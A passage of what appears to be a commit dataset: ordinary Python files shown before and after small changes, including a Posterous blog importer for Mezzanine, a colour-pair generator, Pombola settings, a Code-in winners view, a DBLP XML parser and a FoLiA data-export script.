raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path ='sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
Add initial support for importing blog posts from posterous.from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path ='sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
<commit_before><commit_msg>Add initial support for importing blog posts from posterous.<commit_after>from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path ='sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
|
ac80535f35f42f22e85606c00deae7c0329367d9
|
RainbowGenerator.py
|
RainbowGenerator.py
|
# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
Make the world a happier place with a Rainbow!
|
Make the world a happier place with a Rainbow!
|
Python
|
bsd-2-clause
|
Sonophoto/PythonNotes,Sonophoto/PythonNotes
|
Make the world a happier place with a Rainbow!
|
# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
<commit_before><commit_msg>Make the world a happier place with a Rainbow!<commit_after>
|
# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
Make the world a happier place with a Rainbow!# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
<commit_before><commit_msg>Make the world a happier place with a Rainbow!<commit_after># Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
|
51943abe4c5dc072d5e4e4f938f0d66aade93d57
|
pombola/settings/nigeria_base.py
|
pombola/settings/nigeria_base.py
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
Add pombola.spinner to OPTIONAL_APPS in the new settings modules
|
Add pombola.spinner to OPTIONAL_APPS in the new settings modules
|
Python
|
agpl-3.0
|
geoffkilpin/pombola,patricmutwiri/pombola,ken-muturi/pombola,mysociety/pombola,ken-muturi/pombola,patricmutwiri/pombola,hzj123/56th,mysociety/pombola,mysociety/pombola,patricmutwiri/pombola,mysociety/pombola,hzj123/56th,ken-muturi/pombola,ken-muturi/pombola,hzj123/56th,geoffkilpin/pombola,mysociety/pombola,geoffkilpin/pombola,geoffkilpin/pombola,ken-muturi/pombola,geoffkilpin/pombola,patricmutwiri/pombola,hzj123/56th,geoffkilpin/pombola,ken-muturi/pombola,hzj123/56th,patricmutwiri/pombola,patricmutwiri/pombola,hzj123/56th,mysociety/pombola
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
Add pombola.spinner to OPTIONAL_APPS in the new settings modules
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
<commit_before>COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
<commit_msg>Add pombola.spinner to OPTIONAL_APPS in the new settings modules<commit_after>
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
Add pombola.spinner to OPTIONAL_APPS in the new settings modulesCOUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
<commit_before>COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
<commit_msg>Add pombola.spinner to OPTIONAL_APPS in the new settings modules<commit_after>COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
00f3ce70966a202ced03720c9ada0443820e52d3
|
app/soc/modules/gci/views/winners.py
|
app/soc/modules/gci/views/winners.py
|
#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
Implement the view for GCI Winners page.
|
Implement the view for GCI Winners page.
|
Python
|
apache-2.0
|
rhyolight/nupic.son,rhyolight/nupic.son,rhyolight/nupic.son
|
Implement the view for GCI Winners page.
|
#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
<commit_before><commit_msg>Implement the view for GCI Winners page.<commit_after>
|
#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
Implement the view for GCI Winners page.#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
<commit_before><commit_msg>Implement the view for GCI Winners page.<commit_after>#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
|
678a3e2fbe54fc1f7e15074383db290cb198b837
|
code/loader/dblploader/dblpcontent.py
|
code/loader/dblploader/dblpcontent.py
|
class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
Split loader and xml handler
|
Split loader and xml handler
|
Python
|
mit
|
arcosta/sci-synergy,arcosta/sci-synergy,arcosta/sci-synergy
|
Split loader and xml handler
|
class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
<commit_before><commit_msg>Split loader and xml handler<commit_after>
|
class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
Split loader and xml handlerclass DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
<commit_before><commit_msg>Split loader and xml handler<commit_after>class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
|
e04609d6ac992c6ff06b7e907901dbfa3bfa4e38
|
folia2visualizaton.py
|
folia2visualizaton.py
|
"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
Add script to generate input data for the visualization assignment
|
Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words>
|
Python
|
apache-2.0
|
NLeSC/embodied-emotions-scripts,NLeSC/embodied-emotions-scripts
|
Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words>
|
"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
